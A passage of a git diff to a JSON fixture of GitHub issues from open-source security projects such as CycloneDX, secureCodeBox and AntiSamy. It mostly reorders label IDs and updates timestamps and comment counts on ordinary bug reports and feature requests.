CI unit tests and such.\r\n\r\n\r\n## Additional context\r\n\r\nPHP 8.4 is not released, but in beta state.\r\nsee https://wiki.php.net/todo/php84", @@ -98231,10 +98237,10 @@ "repository": 1273, "assignees": [], "labels": [ - 605, - 606, 608, - 609 + 609, + 605, + 606 ] } }, @@ -98264,8 +98270,8 @@ "repository": 1273, "assignees": [], "labels": [ - 603, - 610 + 610, + 603 ] } }, @@ -98295,9 +98301,9 @@ "repository": 1273, "assignees": [], "labels": [ - 606, 608, - 611 + 611, + 606 ] } }, @@ -98327,9 +98333,9 @@ "repository": 1273, "assignees": [], "labels": [ - 606, 608, - 612 + 612, + 606 ] } }, @@ -98338,7 +98344,7 @@ "pk": 3252, "fields": { "nest_created_at": "2024-09-11T23:32:47.730Z", - "nest_updated_at": "2024-09-18T18:57:53.772Z", + "nest_updated_at": "2024-09-22T18:47:52.151Z", "node_id": "I_kwDOGC0Mg86T3_QD", "title": " Official support for php8.4", "body": "## Is your feature request related to a problem? Please describe.\r\n\r\nAdd official support for PHP8.4\r\n\r\n## Describe the solution you'd like\r\n\r\nassert PHP 8.4 support in CI unit tests and such.\r\n\r\n\r\n## Additional context\r\n\r\nPHP 8.4 is not released, but in beta state.\r\nsee https://wiki.php.net/todo/php84", @@ -98813,9 +98819,9 @@ "repository": 1275, "assignees": [], "labels": [ + 624, 620, - 621, - 624 + 621 ] } }, @@ -98913,10 +98919,10 @@ "repository": 1275, "assignees": [], "labels": [ + 628, 620, 621, - 623, - 628 + 623 ] } }, @@ -98978,9 +98984,9 @@ "repository": 1276, "assignees": [], "labels": [ + 632, 630, - 631, - 632 + 631 ] } }, @@ -99072,8 +99078,8 @@ "repository": 1276, "assignees": [], "labels": [ - 630, - 636 + 636, + 630 ] } }, @@ -99144,7 +99150,7 @@ "pk": 3278, "fields": { "nest_created_at": "2024-09-11T23:35:20.732Z", - "nest_updated_at": "2024-09-18T18:58:12.506Z", + "nest_updated_at": "2024-09-19T07:26:16.115Z", "node_id": "I_kwDOF93kBM59W3NC", "title": "Components not properly in dep tree nor BOM", "body": "This is version 6.4.0\r\n\r\nComponents with unique bom_refs, but the same name, will generate an error when trying to render a dependency tree. Given this script:\r\n```python\r\n#!/usr/bin/env python3\r\n\r\nfrom cyclonedx.model.bom import Bom\r\nfrom cyclonedx.model.component import Component, ComponentType\r\nfrom cyclonedx.output.json import JsonV1Dot5\r\n\r\nbom = Bom()\r\nbom.metadata.component = root_component = Component(\r\n name='myApp',\r\n type=ComponentType.APPLICATION,\r\n bom_ref=\"myApp\"\r\n)\r\n\r\ncomponent1 = Component(\r\n type=ComponentType.LIBRARY,\r\n name='some-component',\r\n bom_ref=\"some-component\"\r\n)\r\nbom.components.add(component1)\r\nbom.register_dependency(root_component, [component1])\r\n\r\ncomponent2 = Component(\r\n type=ComponentType.LIBRARY,\r\n name='some-library',\r\n bom_ref=\"some-library1\"\r\n)\r\nbom.components.add(component2)\r\nbom.register_dependency(component1, [component2])\r\n\r\ncomponent3 = Component(\r\n type=ComponentType.LIBRARY,\r\n name='some-library',\r\n bom_ref=\"some-library2\"\r\n)\r\nbom.components.add(component3)\r\nbom.register_dependency(component1, [component3])\r\n\r\nprint(JsonV1Dot5(bom).output_as_string(indent=2))\r\n```\r\nI get this error when I run it:\r\n```\r\nTraceback (most recent call last):\r\n File \"/Users/tek30584/programming/cdx_lib_bugs/./duplicate_name_bug.py\", line 38, in \r\n print(JsonV1Dot5(bom).output_as_string(indent=2))\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/tek30584/programming/cdx_lib_bugs/.venv/lib/python3.11/site-packages/cyclonedx/output/json.py\", line 82, in output_as_string\r\n self.generate()\r\n File \"/Users/tek30584/programming/cdx_lib_bugs/.venv/lib/python3.11/site-packages/cyclonedx/output/json.py\", line 70, in generate\r\n bom.validate()\r\n File \"/Users/tek30584/programming/cdx_lib_bugs/.venv/lib/python3.11/site-packages/cyclonedx/model/bom.py\", line 600, in validate\r\n raise UnknownComponentDependencyException(\r\ncyclonedx.exception.model.UnknownComponentDependencyException: One or more Components have Dependency references to Components/Services that are not known in this BOM. They are: {}\r\n```\r\n", @@ -99157,10 +99163,10 @@ "sequence_id": 2103145282, "is_locked": false, "lock_reason": "", - "comments_count": 16, + "comments_count": 17, "closed_at": null, "created_at": "2024-01-27T02:33:59Z", - "updated_at": "2024-09-18T17:33:31Z", + "updated_at": "2024-09-18T19:58:58Z", "author": 1484, "repository": 1276, "assignees": [ @@ -99262,9 +99268,9 @@ 1483 ], "labels": [ - 630, 632, - 634 + 634, + 630 ] } }, @@ -99294,9 +99300,9 @@ "repository": 1276, "assignees": [], "labels": [ - 630, 634, - 637 + 637, + 630 ] } }, @@ -99328,9 +99334,9 @@ 1483 ], "labels": [ + 634, 630, - 631, - 634 + 631 ] } }, @@ -99362,8 +99368,8 @@ 1236 ], "labels": [ - 635, - 638 + 638, + 635 ] } }, @@ -99576,7 +99582,7 @@ "pk": 3292, "fields": { "nest_created_at": "2024-09-11T23:37:05.266Z", - "nest_updated_at": "2024-09-18T18:58:20.488Z", + "nest_updated_at": "2024-09-22T18:48:36.634Z", "node_id": "I_kwDOCAGzJ86De2Qm", "title": "invalid option: --format ", "body": "\r\n```\r\n$ cyclonedx-ruby --path . --format json\r\n/bundle/gems/cyclonedx-ruby-1.1.0/lib/bom_builder.rb:68:in `setup': invalid option: --format (OptionParser::InvalidOption)\r\n\tfrom /bundle/gems/cyclonedx-ruby-1.1.0/lib/bom_builder.rb:15:in `build'\r\n\tfrom /bundle/gems/cyclonedx-ruby-1.1.0/bin/cyclonedx-ruby:4:in `'\r\n\tfrom /bundle/bin/cyclonedx-ruby:23:in `load'\r\n\tfrom /bundle/bin/cyclonedx-ruby:23:in `
'\r\n```\r\nformat is in readme.md, but didn't work", @@ -100297,7 +100303,7 @@ "pk": 3317, "fields": { "nest_created_at": "2024-09-11T23:37:35.673Z", - "nest_updated_at": "2024-09-18T18:58:24.521Z", + "nest_updated_at": "2024-09-22T18:48:44.044Z", "node_id": "I_kwDOCzNM4s6T3SVa", "title": "Metadata components should not have sub-components", "body": "[As of now](https://github.com/CycloneDX/cyclonedx-rust-cargo/blob/7596551f4caeb368e500c501b5a28f80d5347aa0/cargo-cyclonedx/src/generator.rs#L251-L252), cargo-cyclonedx explicitly creates sub-components for the component entry in the metadata for the respective compilation targets. \r\n\r\nThis appears to contradict with the suggestions in the [Authoritative Guide to SBOM](https://cyclonedx.org/guides/OWASP_CycloneDX-Authoritative-Guide-to-SBOM-en.pdf#page=69), that states, that \"The SBOM should have a single bom.metadata.component without subcomponents\".\r\n\r\nThis has the consequence, that generated SBoMs currently cannot be properly processed by third-party tools, e.g., Dependency Track.", @@ -100583,7 +100589,7 @@ "pk": 3327, "fields": { "nest_created_at": "2024-09-11T23:37:59.785Z", - "nest_updated_at": "2024-09-18T18:58:29.119Z", + "nest_updated_at": "2024-09-22T18:48:58.498Z", "node_id": "I_kwDOFgaf5s6NuZC1", "title": "Feature Request - Add Support for CycloneDX 1.6", "body": "The CycloneDX Web Tool does not have support for 1.6 schema", @@ -100883,8 +100889,8 @@ "repository": 1280, "assignees": [], "labels": [ - 652, - 656 + 656, + 652 ] } }, @@ -100914,8 +100920,8 @@ "repository": 1280, "assignees": [], "labels": [ - 652, - 658 + 658, + 652 ] } }, @@ -101335,7 +101341,7 @@ "pk": 3352, "fields": { "nest_created_at": "2024-09-11T23:39:31.763Z", - "nest_updated_at": "2024-09-18T18:58:46.659Z", + "nest_updated_at": "2024-09-22T18:52:04.399Z", "node_id": "I_kwDOI5hqm85-uQrc", "title": "Support --shortened-strings parameter in v1.3.0 of cyclonedx-cocoapods", "body": "The new `--shortened-strings` parameter should be supported.\r\n\r\nAlso the default version can be raised to v1.3.0.", @@ -101391,7 +101397,7 @@ "pk": 3354, "fields": { "nest_created_at": "2024-09-11T23:39:37.493Z", - "nest_updated_at": "2024-09-18T18:58:50.781Z", + "nest_updated_at": "2024-09-22T18:52:09.348Z", "node_id": "I_kwDOEFay2c6EH5AS", "title": "Use of deprecated node versions", "body": "This action is still using node `node12`. When I use it, I get a warning of a deprecated node version. Could this be updated to the latest Node version?", @@ -101419,7 +101425,7 @@ "pk": 3355, "fields": { "nest_created_at": "2024-09-11T23:39:43.258Z", - "nest_updated_at": "2024-09-18T18:58:55.168Z", + "nest_updated_at": "2024-09-22T18:52:14.337Z", "node_id": "I_kwDOFkm5l86Ag8_X", "title": "Deprecation warning due to Node 16", "body": "Node 16 is now [deprecated](https://github.blog/changelog/2023-09-22-github-actions-transitioning-from-node-16-to-node-20/) because of which there are warnings when using this action.\r\n\r\nAny plans to update the action to use Node 20?", @@ -101447,7 +101453,7 @@ "pk": 3356, "fields": { "nest_created_at": "2024-09-11T23:39:52.970Z", - "nest_updated_at": "2024-09-18T18:58:59.616Z", + "nest_updated_at": "2024-09-22T18:52:20.315Z", "node_id": "I_kwDOEKecAc5dsI6B", "title": "[IDEA] make universal", "body": "current implementation utilizes https://github.com/CycloneDX/cyclonedx-node-module/ \r\nin version `@<4`\r\nv3 is deprecated. v4 became a meta package, utilizing special implmentations for npm, pnpm, yarn, ...\r\n\r\nGOAL: rework this GH action:\r\n- input (intended to be as much backward compatible as possible, to not break users of `@master` version to much)\r\n - `path` to the project dir - default to `./`\r\n - `cyclonedx-version`: {`1.4`, `1.3`, ...} - default to latest`\r\n - `output`: output file - default to `./bom.xml`\r\n - package-manager: {`npm`, `pnpm`, `yarn`, `yarn2`}\r\n- it is expected that the env anlready has a node env setup and the packagemanager is installed.\r\n- auto-detection: based on lock file type\r\n - it could detect existence of {npm,pnpm,yarn}-lockfile\r\n- process:\r\n - if the tools are not yet available in the current target env, then\r\n the needed appropriate tools are installed with the according eco system (`npx i`/`pnpm add`,`yarn add`) in a temp dir\r\n - the appropriate application is run from that temp dir\r\n - if there is no appropriate application (yet) the GH action exists with an error, prints a info message.\r\n\r\n----\r\n\r\ninternally\r\n- [ ] utilize https://github.com/CycloneDX/cyclonedx-node-npm\r\n- [ ] utilize https://github.com/CycloneDX/cyclonedx-node-pnpm \r\n- [ ] utilize https://github.com/CycloneDX/cyclonedx-node-yarn\r\n\r\n----\r\n\r\nchange process: \r\n- [x] write the docs with: `use @v1` - instead of `@master`\r\n- [ ] current master becomes available as git branch `1.x`\r\n- [ ] next version is properly tagged as `v2` and so on ... \r\n- :warning: since there might be uses that run directly on `@master` - the master branch must be working all the time - do development in a dedicated temp branch ! \r\n\r\n", @@ -101537,7 +101543,7 @@ "pk": 3359, "fields": { "nest_created_at": "2024-09-11T23:40:04.620Z", - "nest_updated_at": "2024-09-18T18:59:04.878Z", + "nest_updated_at": "2024-09-22T18:52:27.671Z", "node_id": "I_kwDOEKXYCM59AVs2", "title": ":mega: migrate to `cyclonedx/cyclonedx-php-composer >= 4` ???", "body": "current implementation of this GitHub action uses an outdated and unmaintained version of [`cyclonedx/cyclonedx-php-composer < 4`](https://packagist.org/packages/cyclonedx/cyclonedx-php-composer).\r\n\r\n\r\nshould this GitHub action be migrated to [`cyclonedx/cyclonedx-php-composer >= 4`](https://packagist.org/packages/cyclonedx/cyclonedx-php-composer)? \r\n**If you like the idea, give this issue thumbs up, or write a comment.**", @@ -101836,7 +101842,7 @@ "pk": 3369, "fields": { "nest_created_at": "2024-09-11T23:40:31.913Z", - "nest_updated_at": "2024-09-18T18:59:14.753Z", + "nest_updated_at": "2024-09-22T18:52:39.812Z", "node_id": "I_kwDOHu650M6MJ4V3", "title": "provide examples for \"provider/supplier/manufactuer/author\" roles re: different types of BOMs", "body": "during the specification review, @mrutkows and i discussed wanting to provide examples for the various \"role\" categories in the spec. Matt had the great idea to do this *per* BOM type (section 6 of the spec) and to make graphics for these.", @@ -102036,7 +102042,7 @@ "pk": 3376, "fields": { "nest_created_at": "2024-09-11T23:40:46.759Z", - "nest_updated_at": "2024-09-18T18:59:22.353Z", + "nest_updated_at": "2024-09-22T18:52:51.518Z", "node_id": "I_kwDOIxJDq86RLxt8", "title": "Feature Request: License Scanner can detect missing license", "body": "For CI/CD, we'd like a better ability to test for an expected license.\r\n\r\nTBD how much of this needs to change license-scanner vs. just evaluating the result in the caller.\r\n\r\nThis could be related to #29 with respect to the allow-list (expected-list?) and return code, but it is fundamentally different use case to check for unwanted (not allowed) as opposed to checking for unexpected plus not-found.", @@ -102064,7 +102070,7 @@ "pk": 3377, "fields": { "nest_created_at": "2024-09-11T23:40:54.320Z", - "nest_updated_at": "2024-09-18T18:59:26.928Z", + "nest_updated_at": "2024-09-22T18:52:57.501Z", "node_id": "I_kwDOJ03dO86HcXUs", "title": "License file is missing", "body": "Hello,\r\n\r\nI would like to use this repo in cdxgen. Noticed that license information is missing for the repo, while there are individual licenses against the bom files.\r\n\r\nThanks in advance!", @@ -102113,9 +102119,9 @@ "repository": 1297, "assignees": [], "labels": [ - 671, 672, - 673 + 673, + 671 ] } }, @@ -102145,8 +102151,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102176,8 +102182,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102207,8 +102213,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102238,8 +102244,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102269,8 +102275,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102300,8 +102306,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 673 + 673, + 671 ] } }, @@ -102391,9 +102397,9 @@ "repository": 1297, "assignees": [], "labels": [ - 671, 672, - 673 + 673, + 671 ] } }, @@ -102453,9 +102459,9 @@ "repository": 1297, "assignees": [], "labels": [ - 671, 672, - 673 + 673, + 671 ] } }, @@ -102485,9 +102491,9 @@ "repository": 1297, "assignees": [], "labels": [ - 671, 672, - 673 + 673, + 671 ] } }, @@ -102517,8 +102523,8 @@ "repository": 1297, "assignees": [], "labels": [ - 671, - 674 + 674, + 671 ] } }, @@ -102550,9 +102556,9 @@ 1163 ], "labels": [ - 671, 673, - 675 + 675, + 671 ] } }, @@ -102589,7 +102595,7 @@ "pk": 3394, "fields": { "nest_created_at": "2024-09-11T23:41:41.888Z", - "nest_updated_at": "2024-09-18T18:59:43.583Z", + "nest_updated_at": "2024-09-22T18:53:19.138Z", "node_id": "I_kwDOIv8ebs6EPl-G", "title": "TODO: Change Formulation and ModelCard schemas to use pointers", "body": "The CycloneDX schema file:\r\n\r\n/Users/Matt_1/Projects/CycloneDX/sbom-utility/schema/cyclonedx_formulation.go\r\n\r\ndefines all the structures used for \"formulation\" which was added in v1.5; however, these structs should be updated to use pointers to structs in all cases to improve performance during JSON Marshal (decoding).\r\n\r\nThe same should be done for the added ModelCard data (as part of the Component type):\r\n\r\n/Users/Matt_1/Projects/CycloneDX/sbom-utility/schema/cyclonedx_modelcard.go", @@ -102642,9 +102648,9 @@ "repository": 1297, "assignees": [], "labels": [ - 671, 672, - 673 + 673, + 671 ] } }, @@ -103314,8 +103320,8 @@ "repository": 1298, "assignees": [], "labels": [ - 679, - 681 + 681, + 679 ] } }, @@ -103429,8 +103435,8 @@ "repository": 1298, "assignees": [], "labels": [ - 679, - 681 + 681, + 679 ] } }, @@ -103552,8 +103558,8 @@ 117 ], "labels": [ - 679, - 681 + 681, + 679 ] } }, @@ -103611,8 +103617,8 @@ "repository": 1298, "assignees": [], "labels": [ - 678, - 682 + 682, + 678 ] } }, @@ -104025,10 +104031,10 @@ "repository": 1298, "assignees": [], "labels": [ - 684, - 687, 688, - 689 + 689, + 684, + 687 ] } }, @@ -104179,10 +104185,10 @@ "repository": 1298, "assignees": [], "labels": [ - 684, - 687, 688, - 689 + 689, + 684, + 687 ] } }, @@ -104244,9 +104250,9 @@ "repository": 1298, "assignees": [], "labels": [ - 679, 683, - 684 + 684, + 679 ] } }, @@ -104506,8 +104512,8 @@ "repository": 1298, "assignees": [], "labels": [ - 683, - 690 + 690, + 683 ] } }, @@ -104668,7 +104674,7 @@ "pk": 3464, "fields": { "nest_created_at": "2024-09-12T00:07:55.959Z", - "nest_updated_at": "2024-09-18T18:59:49.081Z", + "nest_updated_at": "2024-09-22T18:53:26.751Z", "node_id": "I_kwDOBYZ-Wc53-IDm", "title": "Description of `metadata.supplier` is confusing", "body": "As of v1.5, the description of `metadata.supplier` states:\r\n\r\nhttps://github.com/CycloneDX/specification/blob/299209abd9531d808e0cc4235e77a7c4b1b53d96/schema/bom-1.5.schema.json#L268-L271\r\n\r\nThis is in addition to `metadata.component.supplier`, which states:\r\n\r\nhttps://github.com/CycloneDX/specification/blob/299209abd9531d808e0cc4235e77a7c4b1b53d96/schema/bom-1.5.schema.json#L430-L434\r\n\r\nBased on those descriptions, it is unclear what the subject of `metadata.supplier` is. `metadata.component` *is* the component that the BOM describes, meaning `metadata.component.supplier` would be the same as `metadata.supplier`.\r\n\r\nAs discussed in [this Slack thread](https://cyclonedx.slack.com/archives/CVA0G10FN/p1699447821448959), it seems that `metadata.supplier` describes the supplier **of the BOM itself**. If that is the case, the schema documentation should be updated to include this fact.", @@ -104924,9 +104930,9 @@ "repository": 1298, "assignees": [], "labels": [ + 688, 683, - 687, - 688 + 687 ] } }, @@ -104990,8 +104996,8 @@ "repository": 1298, "assignees": [], "labels": [ - 678, - 691 + 691, + 678 ] } }, @@ -105049,8 +105055,8 @@ "repository": 1298, "assignees": [], "labels": [ - 678, - 691 + 691, + 678 ] } }, @@ -105814,8 +105820,8 @@ "repository": 1298, "assignees": [], "labels": [ - 678, - 682 + 682, + 678 ] } }, @@ -105995,8 +106001,8 @@ "repository": 1298, "assignees": [], "labels": [ - 678, - 681 + 681, + 678 ] } }, @@ -106118,8 +106124,8 @@ "repository": 1298, "assignees": [], "labels": [ - 687, - 688 + 688, + 687 ] } }, @@ -106149,10 +106155,10 @@ "repository": 1298, "assignees": [], "labels": [ - 685, - 687, 688, - 689 + 689, + 685, + 687 ] } }, @@ -106191,7 +106197,7 @@ "pk": 3515, "fields": { "nest_created_at": "2024-09-12T00:09:11.902Z", - "nest_updated_at": "2024-09-12T00:09:11.902Z", + "nest_updated_at": "2024-09-22T18:53:37.182Z", "node_id": "I_kwDOFolqJc5HX9cP", "title": "Add BOM Meta Endpoint", "body": "The idea behind a BOM Meta endpoint is to provide format, hash, and external signature information.\r\n\r\nThe BOM Meta retrieval would work similar to the existing BOM retrieval, but would return metadata rather than the BOM itself. \r\n\r\n```\r\nbom-meta-url = system-url \"/\" bom-identifier\r\nbom-identifier = segment\r\n ; an identifier that uniquely identifies a BOM\r\n ; NOTE: MUST be appropriately URI encoded\r\n ; segment as defined in RFC3986\r\n```\r\n\r\nAs an example, here's a snippet response for what I'm thinking about being returned:\r\n\r\n```json\r\n{\r\n \"spec\": {\r\n \"format\": \"CycloneDX\",\r\n \"version\": \"1.4\",\r\n \"mime-type\": \"application/vnd.cyclonedx+json\",\r\n },\r\n \"published\": \"2022-03-07T15:50+00Z\",\r\n \"checksum\": [\r\n { \"alg\": \"SHA-256\", \"value\": \"CF80CD8...\" },\r\n { \"alg\": \"SHA-512\", \"value\": \"CF80CD8...\" },\r\n { \"alg\": \"SHA3-256\", \"value\": \"CF80CD8...\" },\r\n { \"alg\": \"SHA3-512\", \"value\": \"CF80CD8...\" },\r\n { \"alg\": \"BLAKE3\", \"value\": \"CF80CD8...\" }\r\n ],\r\n \"signature\": [\r\n \r\n ]\r\n}\r\n```\r\n\r\nI think `alg` should be an enum with only those supported algorithms.\r\n\r\nAs for signatures, it would be ideal if we could support external signature files, signature services (e.g sigstore), and external inline.", @@ -106204,10 +106210,10 @@ "sequence_id": 1197463311, "is_locked": false, "lock_reason": "", - "comments_count": 4, + "comments_count": 5, "closed_at": null, "created_at": "2022-04-08T15:22:47Z", - "updated_at": "2024-08-20T06:58:26Z", + "updated_at": "2024-09-19T12:23:00Z", "author": 117, "repository": 1299, "assignees": [], @@ -106819,7 +106825,7 @@ "pk": 3536, "fields": { "nest_created_at": "2024-09-12T00:09:44.740Z", - "nest_updated_at": "2024-09-18T18:59:57.781Z", + "nest_updated_at": "2024-09-22T18:53:43.799Z", "node_id": "MDU6SXNzdWU5MzY0MDcyNTk=", "title": "Synchronize the Drop downs", "body": "Currently, when we open a vulnerability dropdown, it will remain open when we open another dropdown. We are looking for behavior where if we open another Vulnerability dropdown, then the previous one should close automatically.\r\n\r\nCurrent behavior:\r\n![image](https://user-images.githubusercontent.com/13570884/124378702-7c33a600-dcd0-11eb-86cd-b16a46492995.png)\r\n\r\nIn the image both the command injection and unrestricted file upload are open where as it should be such that one should only open and when another drop down is opened, it will automatically close the previous one.", @@ -106969,9 +106975,9 @@ "repository": 1300, "assignees": [], "labels": [ + 704, 697, - 698, - 704 + 698 ] } }, @@ -107003,9 +107009,9 @@ 1566 ], "labels": [ + 704, 697, - 699, - 704 + 699 ] } }, @@ -107063,10 +107069,10 @@ "repository": 1300, "assignees": [], "labels": [ + 704, 697, 698, - 699, - 704 + 699 ] } }, @@ -107098,8 +107104,8 @@ "labels": [ 697, 699, - 702, - 705 + 705, + 702 ] } }, @@ -107130,8 +107136,8 @@ "assignees": [], "labels": [ 696, - 699, - 705 + 705, + 699 ] } }, @@ -107161,10 +107167,10 @@ "repository": 1300, "assignees": [], "labels": [ - 699, - 702, 704, - 705 + 705, + 699, + 702 ] } }, @@ -107194,9 +107200,9 @@ "repository": 1300, "assignees": [], "labels": [ - 698, 704, - 705 + 705, + 698 ] } }, @@ -107226,12 +107232,12 @@ "repository": 1300, "assignees": [], "labels": [ + 704, + 705, 697, 698, 699, - 702, - 704, - 705 + 702 ] } }, @@ -107261,8 +107267,8 @@ "repository": 1300, "assignees": [], "labels": [ - 699, - 705 + 705, + 699 ] } }, @@ -107299,7 +107305,7 @@ "pk": 3551, "fields": { "nest_created_at": "2024-09-12T00:10:37.455Z", - "nest_updated_at": "2024-09-18T19:00:12.434Z", + "nest_updated_at": "2024-09-22T19:21:34.383Z", "node_id": "I_kwDOEtXsps5obynU", "title": "vmc make up issue", "body": "I just downloaded the demo following your step but i got this issue. What is error 18 and how can i fix it?\r\n![353615456_2492800750883091_9001854653944864193_n](https://github.com/DSecureMe/vmc-demo/assets/92416927/3c65aee3-e7e5-4134-ac84-2ef7df0300bf)\r\n", @@ -107327,7 +107333,7 @@ "pk": 3552, "fields": { "nest_created_at": "2024-09-12T00:10:44.006Z", - "nest_updated_at": "2024-09-18T19:00:16.989Z", + "nest_updated_at": "2024-09-22T19:21:39.246Z", "node_id": "I_kwDODWpJq86GjjlU", "title": "All of the used tools are outdated", "body": "All of the used tools (kibana, hive, elastic and etc.) are deprecated and outdated. Please update and upgrade docker files and configurations. \r\n\r\n - Kibana and Elastic has no xpack auth and etc.\r\n - Hive is working on old version\r\n - Ralph return 500 server error.\r\n \r\n ", @@ -107355,7 +107361,7 @@ "pk": 3553, "fields": { "nest_created_at": "2024-09-12T00:10:53.460Z", - "nest_updated_at": "2024-09-18T19:00:21.436Z", + "nest_updated_at": "2024-09-22T19:21:44.914Z", "node_id": "I_kwDODNp09M5oXvtX", "title": "Import CSV File Feature in ", "body": "Does VMC support importing CSV or JSON files of the vulnerability scan customized result containing the details of the vulnerabilities detected on each host? Thanks!", @@ -108206,7 +108212,7 @@ "pk": 3583, "fields": { "nest_created_at": "2024-09-12T00:12:01.262Z", - "nest_updated_at": "2024-09-18T19:00:32.431Z", + "nest_updated_at": "2024-09-22T19:21:57.592Z", "node_id": "I_kwDOCLYjkM6SaR8O", "title": "How can we use this for Mobile apps apk,aab and ipa file scanning or code base scanner", "body": "All questions should be directed to the GitHub discussions or purpleteam-labs Slack. \r\nQuestions submitted through GitHub issues will be closed.\r\n\r\nGitHub discussions\r\n - https://github.com/purpleteam-labs/purpleteam/discussions\r\n\r\nSlack\r\n - https://purpleteam-labs.slack.com/\r\n\r\nSlack invite\r\n - DM us at https://twitter.com/purpleteamlabs\r\n\r\nProviding as much detail as possible, what is your question?\r\n", @@ -108345,9 +108351,9 @@ "repository": 1323, "assignees": [], "labels": [ + 712, 709, - 711, - 712 + 711 ] } }, @@ -108530,8 +108536,8 @@ "repository": 1323, "assignees": [], "labels": [ - 711, - 712 + 712, + 711 ] } }, @@ -108540,7 +108546,7 @@ "pk": 3594, "fields": { "nest_created_at": "2024-09-12T00:14:10.618Z", - "nest_updated_at": "2024-09-18T19:01:20.659Z", + "nest_updated_at": "2024-09-22T19:22:58.497Z", "node_id": "MDU6SXNzdWU5OTI0NjY3NzE=", "title": "ChangePassword does not verify session", "body": "The change password function in csrf.php does not actually check the username or if a valid session has been established. It always returns 'Password changed successfully.' I would also rename it to cswsh.php as it is Cross-Site WebSocket Hijacking. ", @@ -109009,7 +109015,7 @@ "pk": 3610, "fields": { "nest_created_at": "2024-09-12T00:15:44.350Z", - "nest_updated_at": "2024-09-18T19:02:12.309Z", + "nest_updated_at": "2024-09-22T19:24:43.097Z", "node_id": "I_kwDOBB7WaM6PsvPp", "title": "Selfclosing Break Line Tag
tag in html content is converted into
open tag.", "body": "I am using Antisamy to sanitize HTML contents. During the parsing of the HTML Data, the
(self-closing) tag is converted into
(open tag). Is there any specific reason behind this behavior change? Is there any way to retain the
tags?\r\n\r\nEg Input Html Data: `

this is para data


this is para data 2

`\r\n\r\nEg Output Html Data: `

this is para data


this is para data 2

` \r\n\r\nHtmlUnit-Neko version using - 3.11.2\r\nAntisamy version using - 1.7.5", @@ -109022,10 +109028,10 @@ "sequence_id": 2410869737, "is_locked": false, "lock_reason": "", - "comments_count": 19, + "comments_count": 20, "closed_at": null, "created_at": "2024-07-16T11:09:28Z", - "updated_at": "2024-08-17T22:14:50Z", + "updated_at": "2024-09-20T17:54:16Z", "author": 1600, "repository": 1329, "assignees": [], @@ -109037,7 +109043,7 @@ "pk": 3611, "fields": { "nest_created_at": "2024-09-12T00:16:27.885Z", - "nest_updated_at": "2024-09-18T19:02:54.351Z", + "nest_updated_at": "2024-09-22T19:25:55.800Z", "node_id": "MDU6SXNzdWUzMjg2MjMyMDc=", "title": "PDF has next page preview embedded - unreadable", "body": "Hey Tanya! I took a look at the workshop PDF and I'm seeing a small preview of the previous page embedded on each subsequent page. Probably something wonky with the way it was exported. ", @@ -109181,7 +109187,7 @@ "pk": 3616, "fields": { "nest_created_at": "2024-09-12T00:16:45.084Z", - "nest_updated_at": "2024-09-18T19:03:05.663Z", + "nest_updated_at": "2024-09-22T19:26:08.990Z", "node_id": "MDU6SXNzdWUzMzAzMTkwNzY=", "title": "Implement GitLab CI pipeline", "body": "", @@ -109365,10 +109371,10 @@ "pk": 3622, "fields": { "nest_created_at": "2024-09-12T00:17:42.826Z", - "nest_updated_at": "2024-09-12T00:17:42.826Z", + "nest_updated_at": "2024-09-20T18:23:18.703Z", "node_id": "MDU6SXNzdWU3MzQ1MjMyNzY=", "title": "secureCodeBox CLI (scbctl)", - "body": "**Is your feature request related to a problem? Please describe.**\r\n\r\nAs user / developer of the *secureCodeBox* I would like to interact with the *secureCodeBox* via an unified CLI to fulfill tasks such as installing, start, update and delete scanners / hooks, generate stubs for new scanners / hooks\r\n\r\n**Describe the solution you'd like**\r\n\r\nThere is a CLI tool to: \r\n\r\n- [ ] create & observe scans\r\n e.g. `scbctl scan amass enum -d example.com` to directly create a `Scan` with a scanType `amass` and the parameters: `[\"enum\", \"-d\", \"example.com\"]`. Ideally the cli would also have a paramters to automatically \"follow\" the scans progress to view the logs of scanner & parser and show a summary of the results.\r\n- [ ] directly trigger new executions of `ScheduledScan`s \r\n e.g. `scbctl trigger --namespace internal-scans daily-network-scan` to directly trigger a new Scan for the `daily-network-scan` Scheduled Scan\r\n- [ ] interact with cascading rules \r\n\r\n**Additional context**\r\n\r\nA simple implementation could be possible using [Cobra](https://github.com/spf13/cobra)\r\n\r\nFor a previous prototype version of the secureCodeBox there used to be a command line with the ability to start and observe scans, a example scan run can be seen in this video 😛:\r\n\r\nhttps://user-images.githubusercontent.com/13718901/226719918-56d80229-8367-4377-ab1d-9b6761197c69.mp4\r\n\r\n", + "body": "**Is your feature request related to a problem? Please describe.**\n\nAs user / developer of the *secureCodeBox* I would like to interact with the *secureCodeBox* via an unified CLI to fulfill tasks such as installing, start, update and delete scanners / hooks, generate stubs for new scanners / hooks\n\n**Describe the solution you'd like**\n\nThere is a CLI tool to: \n\n- [x] create & observe scans\n e.g. `scbctl scan amass enum -d example.com` to directly create a `Scan` with a scanType `amass` and the parameters: `[\"enum\", \"-d\", \"example.com\"]`. Ideally the cli would also have a paramters to automatically \"follow\" the scans progress to view the logs of scanner & parser and show a summary of the results.\n- [x] directly trigger new executions of `ScheduledScan`s \n e.g. `scbctl trigger --namespace internal-scans daily-network-scan` to directly trigger a new Scan for the `daily-network-scan` Scheduled Scan\n- [x] interact with cascading rules \n\n**Additional context**\n\nA simple implementation could be possible using [Cobra](https://github.com/spf13/cobra)\n\nFor a previous prototype version of the secureCodeBox there used to be a command line with the ability to start and observe scans, a example scan run can be seen in this video 😛:\n\nhttps://user-images.githubusercontent.com/13718901/226719918-56d80229-8367-4377-ab1d-9b6761197c69.mp4\n\n", "summary": "Develop a unified CLI tool for secureCodeBox, enabling users to perform tasks like creating, observing, updating, and deleting scanners and hooks. Implement commands such as \"scbctl scan\" for initiating scans with specific parameters and \"scbctl trigger\" for executing scheduled scans directly. Utilize Cobra for a simple implementation, ensuring features include real-time scan progress tracking and interaction with cascading rules.", "hint": "To address the feature request for a unified CLI tool for the secureCodeBox, you can follow these steps:\n\n1. **Requirement Gathering**: \n - Conduct meetings 